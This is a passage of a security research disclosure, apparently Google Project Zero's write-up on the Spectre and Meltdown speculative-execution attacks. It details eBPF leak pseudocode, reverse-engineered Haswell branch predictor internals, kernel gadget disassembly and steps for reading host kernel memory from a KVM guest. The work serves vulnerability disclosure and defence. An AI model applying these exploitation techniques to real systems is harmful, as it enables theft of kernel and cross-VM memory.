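A minimal sketch of that bisection follows. The whole measurement step (remap two physical pages over the two halves, trigger the out-of-bounds access, time the loads) is hidden behind a hypothetical oracle callback; the callback type, the function names and the simulated oracle are assumptions made for illustration only.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical oracle: returns nonzero if the cached hit landed in the
 * upper half of [base, base + 2 * half_size), zero if in the lower half. */
typedef int (*half_oracle_fn)(uint64_t base, uint64_t half_size, void *ctx);

/* Recover middle_bits unknown bits that sit directly above low_bits
 * already-known bits, one bit per oracle query, most significant first. */
uint64_t bisect_middle_bits(uint64_t base, unsigned low_bits,
                            unsigned middle_bits,
                            half_oracle_fn oracle, void *ctx)
{
    assert(oracle != 0);
    assert(low_bits + middle_bits < 64);

    for (unsigned i = middle_bits; i-- > 0; ) {
        uint64_t half_size = UINT64_C(1) << (low_bits + i);
        if (oracle(base, half_size, ctx))
            base += half_size; /* target is in the upper half */
    }
    return base;
}

/* Simulated oracle for demonstration: ctx points at the true address. */
int simulated_half_oracle(uint64_t base, uint64_t half_size, void *ctx)
{
    uint64_t target = *(const uint64_t *)ctx;
    return target >= base + half_size;
}
```

With 15 unknown bits this needs 15 queries instead of up to 2^15 linear probes.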

 

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

 

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_map, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

 

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 2^7 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.
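
The index arithmetic from the pseudocode can be written as plain C. The sketch below assumes the bitmask selects exactly one bit and the shift selector equals that bit's position; progmap_index_for and rebuild_secret are illustrative names, and the array of observed indices stands in for whatever the cache side channel reports.

```c
#include <assert.h>
#include <stdint.h>

/* Same expression as in the pseudocode, with bitmask = 1 << bit and
 * bitshift_selector = bit: the result is either the base offset or the
 * base offset plus 0x80. */
uint64_t progmap_index_for(uint64_t secret_data, unsigned bit,
                           uint64_t prog_array_base_offset)
{
    assert(bit < 64);
    uint64_t bitmask = UINT64_C(1) << bit;
    uint64_t bitshift_selector = bit;
    return (((secret_data & bitmask) >> bitshift_selector) << 7)
           + prog_array_base_offset;
}

/* Rebuild a 64-bit value from 64 one-bit observations. observed_index[i]
 * is the prog_map index that the side channel reported for bit i. */
uint64_t rebuild_secret(const uint64_t observed_index[64],
                        uint64_t prog_array_base_offset)
{
    uint64_t secret = 0;
    for (unsigned bit = 0; bit < 64; bit++) {
        if (observed_index[bit] - prog_array_base_offset == 0x80)
            secret |= UINT64_C(1) << bit;
    }
    return secret;
}
```

Leaking one bit per invocation keeps the number of probe locations at two, at the cost of 64 invocations per 64-bit value.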

 

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

Basics

Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other’s branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

 

 

 

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won’t know the true destination of the jump, and it won’t be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.

Haswell branch prediction internals

Some of the internals of the branch prediction implemented by Intel’s processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

 

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

 

Haswell seems to have multiple branch prediction mechanisms that work very differently:

 

  • A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
  • A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
  • (There is also a specialized return predictor, according to Intel’s optimization manual, but we haven’t analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)

Generic predictor

The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn’t store the full, absolute destination address.

 

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

 

bit A          bit B
0x40.0000      0x2000
0x80.0000      0x4000
0x100.0000     0x8000
0x200.0000     0x1.0000
0x400.0000     0x2.0000
0x800.0000     0x4.0000
0x2000.0000    0x10.0000
0x4000.0000    0x20.0000

 

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can’t distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.
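
The folding rule can be modeled by reducing each source address to a canonical form: whenever a «bit A» is set, clear it and flip the matching «bit B». Two sources alias exactly when their canonical forms are equal. This is a sketch of the behavior described in the table, not of the hardware; btb_fold and btb_sources_alias are illustrative names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct fold_pair {
    uint32_t bit_a;
    uint32_t bit_b;
};

/* Rows of the folding table above, written as plain hex constants. */
static const struct fold_pair FOLD_PAIRS[] = {
    { 0x00400000u, 0x00002000u },
    { 0x00800000u, 0x00004000u },
    { 0x01000000u, 0x00008000u },
    { 0x02000000u, 0x00010000u },
    { 0x04000000u, 0x00020000u },
    { 0x08000000u, 0x00040000u },
    { 0x20000000u, 0x00100000u },
    { 0x40000000u, 0x00200000u },
};

/* Canonical form of a source address under the XOR folding: keep only
 * the low 31 bits, then move every set bit A onto its bit B. */
uint32_t btb_fold(uint64_t src)
{
    uint32_t folded = (uint32_t)(src & 0x7fffffffu);
    for (size_t i = 0; i < sizeof(FOLD_PAIRS) / sizeof(FOLD_PAIRS[0]); i++) {
        if (folded & FOLD_PAIRS[i].bit_a)
            folded ^= FOLD_PAIRS[i].bit_a | FOLD_PAIRS[i].bit_b;
        assert((folded & FOLD_PAIRS[i].bit_a) == 0);
    }
    return folded;
}

/* Nonzero if the generic predictor, as modeled here, cannot tell the
 * two source addresses apart. */
int btb_sources_alias(uint64_t a, uint64_t b)
{
    return btb_fold(a) == btb_fold(b);
}
```

The four address pairs from the paragraph above make a convenient sanity check: 0x100.0000 aliases with 0x140.2000 and 0x180.4000, but not with 0x180.0000 or 0x180.8000.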

 

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn’t been verified.

 

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 2^32 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
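
One possible reading of this storage hypothesis is sketched below. The struct layout and the direction rule (a source with bit 31 set crosses upwards, otherwise downwards) are assumptions made for illustration; they are consistent with the description above but were not verified on hardware.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical model of what a generic-predictor BTB entry stores. */
struct btb_entry {
    uint32_t target_low32; /* absolute low half of the destination */
    int crosses_4g;        /* nonzero if source and target differ in bits 32+ */
};

/* Record a jump from src to dst in the model. */
struct btb_entry btb_record(uint64_t src, uint64_t dst)
{
    uint64_t src_high = src >> 32;
    uint64_t dst_high = dst >> 32;
    /* The model only covers jumps that cross at most one 4 GiB boundary. */
    assert(src_high == dst_high || src_high + 1 == dst_high ||
           dst_high + 1 == src_high);

    struct btb_entry e;
    e.target_low32 = (uint32_t)dst;
    e.crosses_4g = src_high != dst_high;
    return e;
}

/* Predict the destination for a (possibly different) source address
 * that hits the same entry. */
uint64_t btb_predict(struct btb_entry e, uint64_t src)
{
    uint64_t high = src >> 32;
    if (e.crosses_4g) {
        /* Assumption: bit 31 of the source selects the direction. */
        if (src & 0x80000000u)
            high += 1;
        else
            high -= 1;
    }
    return (high << 32) | e.target_low32;
}
```

Under this model, an entry recorded for the jump from 0x4141.0004.1000 to 0x4141.0004.5123 predicts 0x4242.0004.5123 for a source at 0x4242.0004.1000, matching the example in the «Generic predictor» section.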

Indirect call predictor

The inputs of the BTB lookup for this mechanism seem to be:

 

  • The low 12 bits of the address of the source instruction (we are not sure whether it’s the address of the first or the last byte) or a subset of them.
  • The branch history buffer state.

 

If the indirect call predictor can’t resolve a branch, it is resolved by the generic predictor instead. Intel’s optimization manual hints at this behavior: «Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior.»

 

The branch history buffer (BHB) stores information about the last 29 taken branches — basically a fingerprint of recent control flow — and is used to allow better prediction of indirect calls that can have multiple targets.

 

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

 

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
 *bhb_state <<= 2;
 *bhb_state ^= (dst & 0x3f);
 *bhb_state ^= (src & 0xc0) >> 6;
 *bhb_state ^= (src & 0xc00) >> (10 - 2);
 *bhb_state ^= (src & 0xc000) >> (14 - 4);
 *bhb_state ^= (src & 0x30) << (6 - 4);
 *bhb_state ^= (src & 0x300) << (8 - 8);
 *bhb_state ^= (src & 0x3000) >> (12 - 10);
 *bhb_state ^= (src & 0x30000) >> (16 - 12);
 *bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

 

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn’t been understood yet.
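
Since uint58_t is not a real C type, a compilable version of the update function has to emulate the 58-bit width by masking. The sketch below does that and returns the new state instead of updating it through a pointer; apart from those two changes it follows the pseudocode term by term. The BHB_BITS and BHB_MASK names are introduced here for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define BHB_BITS 58
#define BHB_MASK ((UINT64_C(1) << BHB_BITS) - 1)

/* One BHB update for a taken branch; src is the address of the last
 * byte of the source instruction, dst is the destination address. */
uint64_t bhb_update(uint64_t state, uint64_t src, uint64_t dst)
{
    assert((state & ~BHB_MASK) == 0);

    state = (state << 2) & BHB_MASK;   /* emulate the 58-bit register */
    state ^= (dst & 0x3f);
    state ^= (src & 0xc0) >> 6;
    state ^= (src & 0xc00) >> (10 - 2);
    state ^= (src & 0xc000) >> (14 - 4);
    state ^= (src & 0x30) << (6 - 4);
    state ^= (src & 0x300) << (8 - 8);
    state ^= (src & 0x3000) >> (12 - 10);
    state ^= (src & 0x30000) >> (16 - 12);
    state ^= (src & 0xc0000) >> (18 - 14);
    return state;
}
```

With a 2-bit shift per update and 58 bits of state, the contribution of a branch has been shifted out completely after 29 further taken branches, which matches the statement that the BHB covers the last 29 taken branches. The model also shows that flipping bit 0x1 of the target together with bit 0x40 of the source cancels out, because both land in bit 0 of the state.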

 

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code — for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).

Reverse-Engineering Branch Predictor Internals

This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn’t keep a detailed record of what we were doing.

 

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked — however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

 

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

 

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to «recent program behavior» in Intel’s optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

 

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

 

 

 

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

 

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

 

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

 

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don’t influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn’t influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

 

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn’t store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

 

However, a history buffer needs to «forget» about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards — and given that, upwards combination of information probably wouldn’t be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

 

 

 

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

 

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.
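
The iteration over N can be sketched as follows. The misprediction-rate measurement is abstracted into a hypothetical collision oracle that reports whether an attacker-written history value collides with the victim's history after N zero branches; the callback type, the function names and the simulated oracle are assumptions for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define BHB_MASK ((UINT64_C(1) << 58) - 1)

/* Hypothetical oracle: nonzero if writing `candidate` into the BHB makes
 * the indirect call collide with the path that executed the hypercall
 * followed by n zero branches (observed as a high misprediction rate). */
typedef int (*bhb_collision_fn)(uint64_t candidate, unsigned n, void *ctx);

/* Recover the full BHB state two bits at a time, from N=28 down to N=0. */
uint64_t leak_bhb_state(bhb_collision_fn collides, void *ctx)
{
    uint64_t known = 0; /* history_buffer_for(29): everything shifted out */

    for (unsigned n = 29; n-- > 0; ) {
        int found = 0;
        for (uint64_t top = 0; top < 4 && !found; top++) {
            uint64_t candidate = (top << (28 * 2)) | (known >> 2);
            if (collides(candidate, n, ctx)) {
                known = candidate;
                found = 1;
            }
        }
        assert(found); /* a real measurement would retry instead */
    }
    return known; /* history buffer value for N=0 */
}

/* Simulated oracle for demonstration: ctx points at the victim's state
 * directly after the hypercall; n zero branches shift it left by 2n. */
int simulated_collision(uint64_t candidate, unsigned n, void *ctx)
{
    uint64_t victim = *(const uint64_t *)ctx;
    return candidate == ((victim << (2 * n)) & BHB_MASK);
}
```

Each of the 29 rounds needs at most four measurements, so the full 58-bit state is recovered with at most 116 collision tests.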

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 2^4-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/2^4=1024.
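The search-space arithmetic above can be checked with a few lines of Python. This is only a worked calculation using the numbers from the text; the constant and function names are chosen for illustration.

```python
RANGE_START = 0xffffffffc0000000
RANGE_END = 0xffffffffc4000000
PAGE_SIZE = 0x1000
ALIASES_PER_ADDRESS = 2 ** 4   # the correct address plus its 15 aliases


def kvm_search_space():
    """Return (page-aligned candidates, candidates the predictor can tell apart)."""
    page_slots = (RANGE_END - RANGE_START) // PAGE_SIZE
    distinguishable = page_slots // ALIASES_PER_ADDRESS
    return page_slots, distinguishable
```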

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 2^20) and indirect calls are placed at all possible call sources. Then, alternately, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 2^16 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
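The bisection step can be sketched as follows. This is a simulation under stated assumptions: the candidate list and the `executed_in_first_half` callback are hypothetical stand-ins for "place code that loads cache line A at one half of the candidates and cache line B at the other half, then measure which line was loaded".

```python
def bisect_candidates(candidates, executed_in_first_half):
    """Halve the candidate list until one address is left.

    executed_in_first_half(first_half) must return True when the
    speculatively executed code instance belongs to first_half.
    """
    remaining = list(candidates)
    rounds = 0
    while len(remaining) > 1:
        half = len(remaining) // 2
        first, second = remaining[:half], remaining[half:]
        remaining = first if executed_in_first_half(first) else second
        rounds += 1
    return remaining[0], rounds
```

With 16 aliasing candidates, four measurements are enough in this model.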

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages. To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1. It reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set), and then attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 (the physical address guess minus 0xf8) is added to the result of the previous load, 0xf8 is added to it, and the result is dereferenced.
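The register arithmetic of this gadget can be worked through in Python. The displacements are taken from the disassembly above; the function names and the example values used to exercise them are hypothetical and only illustrate the calculation.

```python
MASK64 = (1 << 64) - 1
DISP_FIRST_LOAD = (-0x7e594c40) & MASK64   # [r15*8-0x7e594c40], sign-extended
DISP_FINAL_LOAD = 0xf8                     # [r8+rax*1+0xf8]


def r9_for_first_load(target_address):
    """R9 value that makes the first load read from target_address."""
    delta = (target_address - DISP_FIRST_LOAD) & MASK64
    if delta >= 1 << 63:                   # interpret as signed 64-bit
        delta -= 1 << 64
    if delta % 8:
        raise ValueError("target must be 8-byte aligned relative to the table")
    index = delta // 8
    if not -(1 << 31) <= index < (1 << 31):
        raise ValueError("target out of reach of a sign-extended 32-bit index")
    return index & 0xffffffff              # movsxd sign-extends r9d


def r8_for_physical_guess(physical_address):
    """R8 is the physical address guess minus 0xf8."""
    return (physical_address - DISP_FINAL_LOAD) & MASK64


def final_load_address(first_load_result, r8):
    """Address dereferenced by the last instruction of the gadget."""
    return (first_load_result + r8 + DISP_FINAL_LOAD) & MASK64
```

If the first load returns page_offset_base, the final address is page_offset_base plus the physical address guess, which is the physmap alias of that physical page.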

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
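To give an idea of what such bytecode could look like, here is a minimal Python 3 sketch that assembles a short eBPF program leaking one bit of a byte into the cache. It is not the bytecode used by the PoC. The opcode values follow the standard Linux eBPF instruction encoding; the register choices, the stride and all addresses passed in are assumptions made for illustration.

```python
import struct


def insn(code, dst=0, src=0, off=0, imm=0):
    """Encode one 8-byte struct bpf_insn (little-endian)."""
    return struct.pack("<BBhI", code, (src << 4) | dst, off, imm & 0xffffffff)


def ld_imm64(dst, value):
    """64-bit immediate load; it occupies two instruction slots."""
    return insn(0x18, dst=dst, imm=value) + insn(0x00, imm=value >> 32)


def leak_bit_program(secret_addr, bit, probe_addr, stride_shift=12):
    """Touch probe_addr + (bit_value << stride_shift), then exit."""
    return b"".join([
        ld_imm64(1, secret_addr),              # r1 = secret_addr
        insn(0x71, dst=0, src=1),              # r0 = *(u8 *)(r1 + 0)
        insn(0x77, dst=0, imm=bit),            # r0 >>= bit
        insn(0x57, dst=0, imm=1),              # r0 &= 1
        insn(0x67, dst=0, imm=stride_shift),   # r0 <<= stride_shift
        ld_imm64(2, probe_addr),               # r2 = probe_addr
        insn(0x0f, dst=2, src=0),              # r2 += r0
        insn(0x79, dst=3, src=2),              # r3 = *(u64 *)(r2 + 0)
        insn(0x95),                            # exit
    ])
```

Depending on the leaked bit, one of two cache lines in the probe area is loaded, which the guest can then detect with FLUSH+RELOAD.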

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
